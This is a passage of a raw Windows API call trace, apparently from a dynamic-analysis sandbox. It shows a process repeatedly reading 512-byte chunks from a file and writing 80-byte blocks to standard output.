[0214.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.064] GetFileType (hFile=0x4c) returned 0x1 [0214.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | 
out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.065] GetFileType (hFile=0x4c) returned 0x1 [0214.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.065] GetFileType (hFile=0x4c) returned 0x1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] GetFileType (hFile=0x4c) returned 0x1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] GetFileType (hFile=0x4c) returned 0x1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] GetFileType (hFile=0x4c) returned 0x1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, 
lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] GetFileType (hFile=0x4c) returned 0x1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.066] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.066] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.066] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.066] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] GetFileType (hFile=0x4c) returned 0x1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] GetFileType (hFile=0x4c) returned 0x1 [0214.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] GetFileType (hFile=0x4c) returned 0x1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] GetFileType (hFile=0x4c) returned 0x1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0214.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] GetFileType (hFile=0x4c) returned 0x1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] GetFileType (hFile=0x4c) returned 0x1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] GetFileType (hFile=0x4c) returned 0x1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] GetFileType (hFile=0x4c) returned 0x1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.067] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.067] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) 
returned 1 [0214.067] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.067] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.067] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] GetFileType (hFile=0x4c) returned 0x1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] GetFileType (hFile=0x4c) returned 0x1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] GetFileType (hFile=0x4c) returned 0x1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] GetFileType (hFile=0x4c) returned 0x1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] GetFileType (hFile=0x4c) returned 0x1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.068] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0214.068] GetFileType (hFile=0x4c) returned 0x1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] GetFileType (hFile=0x4c) returned 0x1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] GetFileType (hFile=0x4c) returned 0x1 [0214.068] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.068] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.069] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.069] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.069] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.069] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] GetFileType (hFile=0x4c) returned 0x1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] GetFileType (hFile=0x4c) returned 0x1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] GetFileType (hFile=0x4c) returned 0x1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] GetFileType (hFile=0x4c) returned 0x1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] GetFileType (hFile=0x4c) returned 0x1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] GetFileType (hFile=0x4c) returned 0x1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] GetFileType (hFile=0x4c) returned 0x1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, 
lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] GetFileType (hFile=0x4c) returned 0x1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.070] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.070] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.070] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.070] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] GetFileType (hFile=0x4c) returned 0x1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] GetFileType (hFile=0x4c) returned 0x1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] GetFileType (hFile=0x4c) returned 0x1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] GetFileType (hFile=0x4c) returned 0x1 [0214.070] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] GetFileType (hFile=0x4c) returned 0x1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] GetFileType (hFile=0x4c) returned 0x1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] GetFileType (hFile=0x4c) returned 0x1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] GetFileType (hFile=0x4c) returned 0x1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.071] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.071] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.071] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.071] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] GetFileType (hFile=0x4c) returned 0x1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] GetFileType (hFile=0x4c) returned 0x1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] GetFileType (hFile=0x4c) returned 0x1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] GetFileType (hFile=0x4c) returned 0x1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] GetFileType (hFile=0x4c) returned 0x1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, 
lpOverlapped=0x0) returned 1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] GetFileType (hFile=0x4c) returned 0x1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] GetFileType (hFile=0x4c) returned 0x1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] GetFileType (hFile=0x4c) returned 0x1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.072] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.072] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.073] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.073] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] GetFileType (hFile=0x4c) returned 0x1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] GetFileType (hFile=0x4c) returned 0x1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] GetFileType (hFile=0x4c) returned 0x1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] GetFileType (hFile=0x4c) returned 0x1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] GetFileType (hFile=0x4c) returned 0x1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] GetFileType (hFile=0x4c) returned 0x1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] GetFileType (hFile=0x4c) returned 0x1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] GetFileType (hFile=0x4c) returned 0x1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.074] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.074] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.074] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.074] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] GetFileType (hFile=0x4c) returned 0x1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] GetFileType (hFile=0x4c) returned 0x1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] GetFileType (hFile=0x4c) returned 0x1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, 